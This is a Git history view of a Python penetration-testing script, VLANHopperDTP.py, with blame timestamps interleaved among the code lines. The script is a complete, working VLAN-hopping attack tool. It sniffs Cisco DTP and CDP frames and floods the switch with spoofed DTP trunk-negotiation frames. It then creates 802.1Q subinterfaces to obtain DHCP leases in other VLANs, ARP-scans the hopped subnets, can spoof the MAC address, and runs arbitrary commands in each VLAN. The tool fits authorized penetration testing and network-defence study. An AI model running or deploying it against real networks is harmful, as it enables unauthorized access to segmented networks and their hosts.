1
0
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git synced 2024-12-23 17:39:48 +01:00
mgeeky-Penetration-Testing-.../networks/VLANHopperDTP.py

872 lines
28 KiB
Python
Raw Normal View History

2018-02-02 22:22:43 +01:00
#!/usr/bin/python
#
# This script is performing DTP Trunk mode detection and VLAN Hopping
# attack automatically, running sniffer afterwards to collect any other
# VLAN available.
#
# This script works best in Unix/Linux environment as the script utilizes
# following applications:
2018-02-02 22:22:43 +01:00
# - 8021q.ko
# - vconfig
# - ifconfig / ip / route
# - dhclient
# - (optional) arp-scan
#
# However, it should also work under non-Unix/Linux platforms or platforms not
# offering aforementioned depenendcies. Under such circumstances the tool behaves
# as was described below.
#
# If the underlying system is not equipped with 8021q.ko and vconfig command,
# the script will be unable to create subinterfaces for discovered VLANs which
# also means no DHCP leases are going to be obtained. The VLAN Hopping attack
# may still be attempted, this will result in the switch passing inter-VLAN traffic
# to our interface to observe, but only passive sniffing will be left possible without
# ability to create subinterfaces to interact with other VLAN networks.
# If that limitation suits is acceptable, one can use --force option passed to this script
# in order to proceed when no vconfig was found.
#
# Python requirements:
# - scapy
2018-02-02 22:22:43 +01:00
#
# NOTICE:
# This program uses code written by 'floodlight', which comes from here:
# https://github.com/floodlight/oftest/blob/master/src/python/oftest/afpacket.py
#
# TODO:
# - Add logic that falls back to static IP address setup when DHCP fails
# - Possibly implement custom ARP/ICMP/DHCP spoofers or launch ettercap
# - Add auto-packets capture functionality via tshark/tcpdump to specified out directory
# - Add functionality to auto-scan via arp-scan desired network
2018-02-02 22:22:43 +01:00
#
# Mariusz B. / mgeeky, '18-19, <mb@binary-offensive.com>
2018-02-02 22:22:43 +01:00
#
import os
import re
2018-02-02 22:22:43 +01:00
import sys
import socket
import struct
import textwrap
2018-02-02 22:22:43 +01:00
import argparse
import tempfile
import commands
import threading
import subprocess
import fcntl, socket, struct
from ctypes import *
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.4.1'
2018-02-02 22:22:43 +01:00
config = {
'verbose' : False,
'debug' : False,
'force' : False,
'count' : 10,
'timeout' : 90,
'analyse' : False,
'interface' : '',
'macaddr' : '',
'inet' : '',
'origmacaddr' : '',
'commands' : [],
'exitcommands' : [],
}
arpScanAvailable = False
vconfigAvailable = False
2018-02-02 22:22:43 +01:00
stopThreads = False
attackEngaged = False
dot1qSnifferStarted = False
vlansDiscovered = set()
vlansHopped = set()
vlansLeases = {}
2018-02-02 22:22:43 +01:00
subinterfaces = set()
cdpsCollected = set()
2018-02-02 22:22:43 +01:00
tempfiles = []
#
# ===============================================
# Floodlight's afpacket definitions
#
ETH_P_8021Q = 0x8100
SOL_PACKET = 263
PACKET_AUXDATA = 8
TP_STATUS_VLAN_VALID = 1 << 4
class struct_iovec(Structure):
_fields_ = [
("iov_base", c_void_p),
("iov_len", c_size_t),
]
class struct_msghdr(Structure):
_fields_ = [
("msg_name", c_void_p),
("msg_namelen", c_uint32),
("msg_iov", POINTER(struct_iovec)),
("msg_iovlen", c_size_t),
("msg_control", c_void_p),
("msg_controllen", c_size_t),
("msg_flags", c_int),
]
class struct_cmsghdr(Structure):
_fields_ = [
("cmsg_len", c_size_t),
("cmsg_level", c_int),
("cmsg_type", c_int),
]
class struct_tpacket_auxdata(Structure):
_fields_ = [
("tp_status", c_uint),
("tp_len", c_uint),
("tp_snaplen", c_uint),
("tp_mac", c_ushort),
("tp_net", c_ushort),
("tp_vlan_tci", c_ushort),
("tp_padding", c_ushort),
]
libc = CDLL("libc.so.6")
recvmsg = libc.recvmsg
recvmsg.argtypes = [c_int, POINTER(struct_msghdr), c_int]
recvmsg.retype = c_int
def enable_auxdata(sk):
"""
Ask the kernel to return the VLAN tag in a control message
Must be called on the socket before afpacket.recv.
"""
sk.setsockopt(SOL_PACKET, PACKET_AUXDATA, 1)
def recv(sk, bufsize):
"""
Receive a packet from an AF_PACKET socket
@sk Socket
@bufsize Maximum packet size
"""
buf = create_string_buffer(bufsize)
ctrl_bufsize = sizeof(struct_cmsghdr) + sizeof(struct_tpacket_auxdata) + sizeof(c_size_t)
ctrl_buf = create_string_buffer(ctrl_bufsize)
iov = struct_iovec()
iov.iov_base = cast(buf, c_void_p)
iov.iov_len = bufsize
msghdr = struct_msghdr()
msghdr.msg_name = None
msghdr.msg_namelen = 0
msghdr.msg_iov = pointer(iov)
msghdr.msg_iovlen = 1
msghdr.msg_control = cast(ctrl_buf, c_void_p)
msghdr.msg_controllen = ctrl_bufsize
msghdr.msg_flags = 0
rv = recvmsg(sk.fileno(), byref(msghdr), 0)
if rv < 0:
raise RuntimeError("recvmsg failed: rv=%d", rv)
# The kernel only delivers control messages we ask for. We
# only enabled PACKET_AUXDATA, so we can assume it's the
# only control message.
assert msghdr.msg_controllen >= sizeof(struct_cmsghdr)
cmsghdr = struct_cmsghdr.from_buffer(ctrl_buf) # pylint: disable=E1101
assert cmsghdr.cmsg_level == SOL_PACKET
assert cmsghdr.cmsg_type == PACKET_AUXDATA
auxdata = struct_tpacket_auxdata.from_buffer(ctrl_buf, sizeof(struct_cmsghdr)) # pylint: disable=E1101
if auxdata.tp_vlan_tci != 0 or auxdata.tp_status & TP_STATUS_VLAN_VALID:
# Insert VLAN tag
tag = struct.pack("!HH", ETH_P_8021Q, auxdata.tp_vlan_tci)
return buf.raw[:12] + tag + buf.raw[12:rv]
else:
return buf.raw[:rv]
#
# ===============================================
#
class Logger:
@staticmethod
def _out(x):
if config['debug'] or config['verbose']:
sys.stdout.write(x + '\n')
@staticmethod
def dbg(x):
if config['debug']:
sys.stdout.write('[dbg] ' + x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[?] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
def inspectPacket(dtp):
tlvs = dtp['DTP'].tlvlist
stat = -1
for tlv in tlvs:
if tlv.type == 2:
stat = ord(tlv.status)
break
ret = True
if stat == -1:
Logger.fail('Something went wrong: Got invalid DTP packet.')
ret = False
elif stat == 2:
Logger.fail('DTP disabled, Switchport in Access mode configuration')
print('[!] VLAN Hopping is not possible.')
ret = False
elif stat == 3:
Logger.ok('DTP enabled, Switchport in default configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 4 or stat == 0x84:
Logger.ok('DTP enabled, Switchport in Dynamic Auto configuration')
print('[+] VLAN Hopping is possible.')
elif stat == 0x83:
Logger.ok('DTP enabled, Switchport in Trunk/Desirable configuration')
print('[+] VLAN Hopping is possible.')
2018-02-02 22:22:43 +01:00
elif stat == 0x81:
Logger.ok('DTP enabled, Switchport in Trunk configuration')
print('[+] VLAN Hopping IS possible.')
elif stat == 0xa5:
Logger.info('DTP enabled, Switchport in Trunk with 802.1Q encapsulation forced configuration')
print('[?] VLAN Hopping may be possible.')
elif stat == 0x42:
Logger.info('DTP enabled, Switchport in Trunk with ISL encapsulation forced configuration')
print('[?] VLAN Hopping may be possible.')
else:
Logger.info('Unknown DTP packet.')
Logger.dbg(dtp.show())
ret = False
2018-02-02 22:22:43 +01:00
if ret:
print('\n[>] After Hopping to other VLANs - leave this program running to maintain connections.')
2018-02-02 22:22:43 +01:00
return ret
def floodTrunkingRequests():
while not stopThreads:
# Ethernet
dot3 = Dot3(src = config['macaddr'], dst = '01:00:0c:cc:cc:cc', len = 42)
# Logical-Link Control
llc = LLC(dsap = 0xaa, ssap = 0xaa, ctrl = 3)
# OUT = Cisco, Code = DTP
snap = SNAP(OUI = 0x0c, code = 0x2004)
# DTP, Status = Access/Desirable (3), Type: Trunk (3)
dtp = DTP(ver = 1, tlvlist = [
DTPDomain(length = 13, type = 1, domain = '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'),
DTPStatus(status = '\\x03', length = 5, type = 2),
DTPType(length = 5, type = 3, dtptype = '\\xa5'),
DTPNeighbor(type = 4, neighbor = config['macaddr'], len = 10)
])
frame = dot3 / llc / snap / dtp
Logger.dbg('SENT: DTP Trunk Keep-Alive:\n{}'.format(frame.summary()))
send(frame, iface = config['interface'], verbose = False)
2018-02-07 10:23:02 +01:00
time.sleep(config['timeout'] / 3)
2018-02-02 22:22:43 +01:00
def engageDot1qSniffer():
global dot1qSnifferStarted
if dot1qSnifferStarted:
return
dot1qSnifferStarted = True
Logger.info('Started VLAN/802.1Q sniffer.')
2018-02-02 22:22:43 +01:00
sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
sock.bind((config['interface'], ETH_P_ALL))
enable_auxdata(sock)
print('[>] Discovering new VLANs...')
while not stopThreads:
buf = recv(sock, 65535)
pkt = Ether(buf)
if pkt.haslayer(Dot1Q):
dot1q = pkt.vlan
if dot1q not in vlansDiscovered:
2018-02-02 22:22:43 +01:00
print('==> VLAN discovered: {}'.format(dot1q))
vlansDiscovered.add(dot1q)
2018-02-02 22:22:43 +01:00
if not config['analyse']:
t = threading.Thread(target = addVlanIface, args = (dot1q, ))
t.daemon = True
t.start()
else:
Logger.info('Analysis mode: Did not go any further.')
Logger.info('Stopped VLAN/802.1Q sniffer.')
def processDtps(dtps):
global attackEngaged
if stopThreads: return
if attackEngaged == False:
success = False
for dtp in dtps:
if dtp.haslayer(DTP):
if inspectPacket(dtp):
success = True
break
if success:
Logger.ok('VLAN Hopping via Switch Spoofing may be possible.')
Logger.dbg('Flooding with fake Access/Desirable DTP frames...\n')
2018-02-02 22:22:43 +01:00
t = threading.Thread(target = floodTrunkingRequests)
t.daemon = True
t.start()
attackEngaged = True
time.sleep(5)
2018-02-07 10:23:02 +01:00
if config['force']:
Logger.ok('FORCED VLAN Hopping via Switch Spoofing.')
Logger.dbg('Flooding with fake Access/Desirable DTP frames...\n')
2018-02-07 10:23:02 +01:00
t = threading.Thread(target = floodTrunkingRequests)
t.daemon = True
t.start()
attackEngaged = True
time.sleep(5)
2018-02-02 22:22:43 +01:00
if attackEngaged:
engageDot1qSniffer()
def launchCommand(subif, cmd, forceOut = False, noCmd = False):
2018-02-02 22:22:43 +01:00
Logger.dbg('Subinterface: {}, Parsing command: "{}"'.format(subif, cmd))
if '%IFACE' in cmd: cmd = cmd.replace('%IFACE', subif)
if '%HWADDR' in cmd: cmd = cmd.replace('%HWADDR', getHwAddr(subif))
if '%IP' in cmd: cmd = cmd.replace('%IP', getIfaceIP(subif))
if '%NET' in cmd: cmd = cmd.replace('%NET', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1"))
if '%MASK' in cmd: cmd = cmd.replace('%MASK', shell("route -n | grep " + subif + " | grep -v UG | awk '{print $3}' | head -1"))
if '%GW' in cmd: cmd = cmd.replace('%GW', shell("route -n | grep " + subif + " | grep UG | awk '{print $2}' | head -1"))
if '%CIDR' in cmd: cmd = cmd.replace('%CIDR', '/' + shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2"))
cmd = cmd.strip()
2018-02-02 22:22:43 +01:00
if not noCmd:
print('[>] Launching command: "{}"'.format(cmd))
out = shell(cmd)
2018-02-02 22:22:43 +01:00
if forceOut:
print('\n' + '.' * 50)
print(out)
print('.' * 50 + '\n')
else:
Logger.info(out)
def launchCommands(subif, commands, forceOut = False, noCmd = False):
2018-02-02 22:22:43 +01:00
for cmd in commands:
launchCommand(subif, cmd, forceOut, noCmd)
2018-02-02 22:22:43 +01:00
def addVlanIface(vlan):
global subinterfaces
global vlansLeases
2018-02-02 22:22:43 +01:00
global tempfiles
subif = '{}.{}'.format(config['interface'], vlan)
if not vconfigAvailable:
Logger.fail('No 8021q or vconfig available. Unable to create {} subinterface and obtain DHCP lease.'.format(subif))
return
2018-02-02 22:22:43 +01:00
if subif in subinterfaces:
Logger.fail('Already created that subinterface: {}'.format(subif))
return
Logger.dbg('Creating new VLAN Subinterface for {}.'.format(vlan))
2018-02-02 22:22:43 +01:00
out = shell('vconfig add {} {}'.format(
config['interface'], vlan
))
if out.startswith('Added VLAN with VID == {}'.format(vlan)):
subinterfaces.add(subif)
pidFile = tempfile.NamedTemporaryFile().name
dbFile = tempfile.NamedTemporaryFile().name
tempfiles.append(pidFile)
tempfiles.append(dbFile)
2018-02-07 10:23:02 +01:00
Logger.dbg('So far so good, subinterface {} added.'.format(subif))
2018-02-02 22:22:43 +01:00
ret = False
for attempt in range(2):
2018-02-02 22:22:43 +01:00
Logger.dbg('Acquiring DHCP lease for {}'.format(subif))
shell('dhclient -lf {} -pf {} -r {}'.format(dbFile, pidFile, subif))
time.sleep(3)
if attempt > 0:
shell('dhclient -lf {} -pf {} -x {}'.format(dbFile, pidFile, subif))
time.sleep(3)
shell('dhclient -lf {} -pf {} {}'.format(dbFile, pidFile, subif))
time.sleep(3)
ip = getIfaceIP(subif)
if ip:
Logger.dbg('Subinterface obtained IP: {}'.format(ip))
2018-02-02 22:22:43 +01:00
ret = True
vlansHopped.add(vlan)
vlansLeases[vlan] = (
ip,
shell("route -n | grep " + subif + " | grep -v UG | awk '{print $1}' | head -1"),
shell("ip addr show " + subif + " | grep 'inet ' | awk '{print $2}' | cut -d/ -f2")
)
print('[+] Hopped to VLAN {}.: {}, subnet: {}/{}'.format(
vlan,
vlansLeases[vlan][0],
vlansLeases[vlan][1],
vlansLeases[vlan][2]
))
2018-02-02 22:22:43 +01:00
launchCommands(subif, config['commands'])
if arpScanAvailable:
Logger.info('ARP Scanning connected subnet.')
print('[>] Other hosts in hopped subnet: ')
launchCommand(subif, "arp-scan -x -g --vlan={} -I %IFACE %NET%CIDR".format(vlan), True, True)
2018-02-02 22:22:43 +01:00
break
else:
Logger.dbg('Subinterface {} did not receive DHCPOFFER.'.format(
subif
))
2018-02-02 22:22:43 +01:00
time.sleep(5)
if not ret:
Logger.fail('Could not acquire DHCP lease for: {}. Skipping.'.format(subif))
2018-02-02 22:22:43 +01:00
else:
Logger.fail('Failed.: "{}"'.format(out))
def addVlansFromCdp(vlans):
while not attackEngaged:
time.sleep(3)
if stopThreads:
return
for vlan in vlans:
Logger.info('Trying to hop to VLAN discovered in CDP packet: {}'.format(
vlan
))
t = threading.Thread(target = addVlanIface, args = (vlan, ))
t.daemon = True
t.start()
vlansDiscovered.add(vlan)
def processCdp(pkt):
global cdpsCollected
global vlansDiscovered
if not Dot3 in pkt or not pkt.dst == '01:00:0c:cc:cc:cc':
return
if not hasattr(pkt, 'msg'):
return
tlvs = {
1: 'Device Hostname',
2: 'Addresses',
3: 'Port ID',
4: 'Capabilities',
5: 'Software Version',
6: 'Software Platform',
9: 'VTP Management Domain',
10:'Native VLAN',
14:'VoIP VLAN',
22:'Management Address',
}
vlans = set()
out = ''
for tlv in pkt.msg:
if tlv.type in tlvs.keys():
fmt = ''
key = ' {}:'.format(tlvs[tlv.type])
key = key.ljust(25)
if hasattr(tlv, 'val'): fmt = tlv.val
elif hasattr(tlv, 'iface'): fmt = tlv.iface
elif hasattr(tlv, 'cap'):
caps = []
if tlv.cap & (2**0) != 0: caps.append("Router")
if tlv.cap & (2**1) != 0: caps.append("TransparentBridge")
if tlv.cap & (2**2) != 0: caps.append("SourceRouteBridge")
if tlv.cap & (2**3) != 0: caps.append("Switch")
if tlv.cap & (2**4) != 0: caps.append("Host")
if tlv.cap & (2**5) != 0: caps.append("IGMPCapable")
if tlv.cap & (2**6) != 0: caps.append("Repeater")
fmt = '+'.join(caps)
elif hasattr(tlv, 'vlan'):
fmt = str(tlv.vlan)
vlans.add(tlv.vlan)
elif hasattr(tlv, 'addr'):
for i in range(tlv.naddr):
addr = tlv.addr[i].addr
fmt += '{}, '.format(addr)
wrapper = textwrap.TextWrapper(
initial_indent = key,
width = 80,
subsequent_indent = ' ' * len(key)
)
out += '{}\n'.format(wrapper.fill(fmt))
Logger.dbg('Discovered new VLANs in CDP announcement: {} = {}'.format(tlvs[tlv.type], out.strip()))
out = re.sub(r'(?:\n)+', '\n', out)
if not out in cdpsCollected:
cdpsCollected.add(out)
print('\n[+] Discovered new CDP aware device:\n{}'.format(out))
if not config['analyse']:
t = threading.Thread(target = addVlansFromCdp, args = (vlans, ))
t.daemon = True
t.start()
else:
Logger.info('Analysis mode: Did not go any further.')
2018-02-02 22:22:43 +01:00
def packetCallback(pkt):
Logger.dbg('RECV: ' + pkt.summary())
if Dot3 in pkt and pkt.dst == '01:00:0c:cc:cc:cc':
processCdp(pkt)
2018-02-02 22:22:43 +01:00
def sniffThread():
global vlansDiscovered
2018-02-02 22:22:43 +01:00
warnOnce = False
Logger.info('Sniffing for CDP/DTP frames (Max count: {}, Max timeout: {} seconds)...'.format(
2018-02-02 22:22:43 +01:00
config['count'], config['timeout']
))
while not stopThreads and not attackEngaged:
dtps = []
2018-02-02 22:22:43 +01:00
try:
dtps = sniff(
count = config['count'],
filter = 'ether[20:2] == 0x2004 or ether[20:2] == 0x2000',
2018-02-02 22:22:43 +01:00
timeout = config['timeout'],
prn = packetCallback,
stop_filter = lambda x: x.haslayer(DTP) or stopThreads,
iface = config['interface']
)
except Exception as e:
if 'Network is down' in str(e):
break
Logger.err('Exception occured during sniffing: ' + str(e))
if len(dtps) == 0 and not warnOnce:
Logger.fail('It seems like there was no DTP frames transmitted.')
Logger.fail('VLAN Hopping may not be possible (unless Switch is in Non-negotiate state):')
Logger.info('\tSWITCH(config-if)# switchport nonnegotiate\t/ or / ')
Logger.info('\tSWITCH(config-if)# switchport mode access\n')
2018-02-02 22:22:43 +01:00
warnOnce = True
if len(dtps) > 0 or config['force']:
if len(dtps) > 0:
Logger.dbg('Got {} DTP frames.\n'.format(
2018-02-02 22:22:43 +01:00
len(dtps)
))
else:
Logger.info('Forced mode: Beginning attack blindly.')
t = threading.Thread(target = processDtps, args = (dtps, ))
t.daemon = True
t.start()
Logger.dbg('Stopped sniffing.')
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
def getIfaceIP(iface):
out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1")
2018-02-02 22:22:43 +01:00
Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
return out
def changeMacAddress(iface, mac):
old = getHwAddr(iface)
print('[>] Changing MAC address of interface {}, from: {} to: {}'.format(
2018-02-02 22:22:43 +01:00
iface, old, mac
))
shell('ifconfig {} down'.format(iface))
shell('ifconfig {} hw ether {}'.format(iface, mac))
shell('ifconfig {} up'.format(iface))
ret = old != getHwAddr(iface)
if ret:
Logger.dbg('Changed.')
else:
Logger.dbg('Not changed.')
return ret
def assure8021qCapabilities():
global vconfigAvailable
2018-02-02 22:22:43 +01:00
if ('not found' in shell('modprobe -n 8021q')):
Logger.err('There is no kernel module named: "8021q".')
2018-02-02 22:22:43 +01:00
return False
if not shell('which vconfig'):
Logger.err('There is no "vconfig" utility. Package required: "vconfig".')
2018-02-02 22:22:43 +01:00
return False
shell('modprobe 8021q')
if not shell('lsmod | 8021q'):
Logger.err('Could not load kernel module named "8021q".')
return False
vconfigAvailable = True
2018-02-02 22:22:43 +01:00
return True
def shell(cmd):
out = commands.getstatusoutput(cmd)[1]
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
return out
def selectDefaultInterface():
global config
commands = {
'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
}
for k, v in commands.items():
out = shell(v)
if len(out) > 0:
Logger.info('Default interface lookup command returned:\n{}'.format(out))
config['interface'] = out
return out
return ''
def cleanup():
if config['origmacaddr'] != config['macaddr']:
Logger.dbg('Restoring original MAC address...')
changeMacAddress(config['interface'], config['origmacaddr'])
if vconfigAvailable:
for subif in subinterfaces:
Logger.dbg('Removing subinterface: {}'.format(subif))
2018-02-02 22:22:43 +01:00
launchCommands(subif, config['exitcommands'])
shell('vconfig rem {}'.format(subif))
2018-02-02 22:22:43 +01:00
Logger.dbg('Removing temporary files...')
for file in tempfiles:
os.remove(file)
def parseOptions(argv):
print('''
:: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky '18-19, <mb@binary-offensive.com>
2018-02-02 22:22:43 +01:00
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-e', '--execute', dest='command', metavar='CMD', default=[], action='append', help='Launch specified command after hopping to new VLAN. One can use one of following placeholders in command: %%IFACE (choosen interface), %%IP (acquired IP), %%NET (net address), %%HWADDR (MAC), %%GW (gateway), %%MASK (full mask), %%CIDR (short mask). For instance: -e "arp-scan -I %%IFACE %%NET%%CIDR". May be repeated for more commands. The command will be launched SYNCHRONOUSLY, meaning - one have to append "&" at the end to make the script go along.')
parser.add_argument('-E', '--exit-execute', dest='exitcommand', metavar='CMD', default=[], action='append', help='Launch specified command at the end of this script (during cleanup phase).')
parser.add_argument('-m', '--mac-address', metavar='HWADDR', dest='mac', default='', help='Changes MAC address of the interface before and after attack.')
#parser.add_argument('-O', '--outdir', metavar='DIR', dest='outdir', default='', help='If set, enables packet capture on interface connected to VLAN Hopped network and stores in specified output directory *.pcap files.')
parser.add_argument('-f', '--force', action='store_true', help='Attempt VLAN Hopping even if DTP was not detected (like in Nonegotiate situation) or the operating system does not have support for 802.1Q through "8021q.ko" kernel module and "vconfig" command. In this case, the tool will only flood wire with spoofed DTP frames which will make possible to sniff inter-VLAN traffic but no interaction can be made.')
2018-02-02 22:22:43 +01:00
parser.add_argument('-a', '--analyse', action='store_true', help='Analyse mode: do not create subinterfaces, don\'t ask for DHCP leases.')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')
args = parser.parse_args()
config['verbose'] = args.verbose
config['debug'] = args.debug
config['analyse'] = args.analyse
config['force'] = args.force
config['interface'] = args.interface
config['commands'] = args.command
config['exitcommands'] = args.exitcommand
2018-02-07 10:23:02 +01:00
if args.force:
config['timeout'] = 30
2018-02-02 22:22:43 +01:00
return args
def printStats():
print('\n' + '-' * 80)
print('\tSTATISTICS\n')
print('[VLANS HOPPED]')
if len(vlansHopped):
print('Successfully hopped (and got DHCP lease) to following VLANs ({}):'.format(
len(vlansHopped)
))
for vlan, net in vlansLeases.items():
print('- VLAN {}: {}, subnet: {}/{}'.format(vlan, net[0], net[1], net[2] ))
else:
print('Did not hop into any VLAN.')
print('\n[VLANS DISCOVERED]')
if len(vlansDiscovered):
print('Discovered following VLANs ({}):'.format(
len(vlansDiscovered)
))
for vlan in vlansDiscovered:
print('- VLAN {}'.format(vlan))
else:
print('No VLANs discovered.')
print('\n[CDP DEVICES]')
if len(cdpsCollected):
print('Discovered following CDP aware devices ({}):'.format(
len(cdpsCollected)
))
for dev in cdpsCollected:
print(dev + '\n')
else:
print('No CDP aware devices discovered.')
2018-02-02 22:22:43 +01:00
def main(argv):
global config
global stopThreads
global arpScanAvailable
2018-02-02 22:22:43 +01:00
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
load_contrib('dtp')
load_contrib('cdp')
2018-02-02 22:22:43 +01:00
if not assure8021qCapabilities():
if config['force']:
Logger.info('Proceeding anyway. The tool will be unable to obtain DHCP lease in hopped networks. Only passive sniffing will be possible.')
else:
Logger.err('Unable to proceed. Consider using --force option to overcome this limitation.')
Logger.err('In such case, the tool will only flood wire with spoofed DTP frames, which will make possible\n\tto sniff inter-VLAN traffic but no interaction can be made.\n\tThis is because the tool is unable to obtain DHCP lease for hopped networks.')
return False
2018-02-02 22:22:43 +01:00
if not opts.interface:
if not selectDefaultInterface():
Logger.err('Could not find suitable interface. Please specify it.')
return False
print('[>] Interface to work on: "{}"'.format(config['interface']))
config['origmacaddr'] = config['macaddr'] = getHwAddr(config['interface'])
if not config['macaddr']:
Logger.err('Could not acquire MAC address of interface: "{}"'.format(
config['interface']
))
return False
else:
Logger.dbg('Interface "{}" has MAC address: "{}"'.format(
config['interface'], config['macaddr']
))
config['inet'] = getIfaceIP(config['interface'])
if not config['inet']:
Logger.fail('Could not acquire interface\'s IP address! Proceeding...')
oldMac = config['macaddr']
if opts.mac:
oldMac = changeMacAddress(config['interface'], opts.mac)
if oldMac:
config['macaddr'] = opts.mac
else:
Logger.err('Could not change interface\'s MAC address!')
return False
if shell("which arp-scan") != '':
arpScanAvailable = True
else:
Logger.err('arp-scan not available: will not perform scanning after hopping.')
2018-02-02 22:22:43 +01:00
t = threading.Thread(target = sniffThread)
t.daemon = True
t.start()
try:
while True:
pass
except KeyboardInterrupt:
print('\n[>] Cleaning up...')
stopThreads = True
time.sleep(3)
cleanup()
printStats()
2018-02-02 22:22:43 +01:00
return True
if __name__ == '__main__':
main(sys.argv)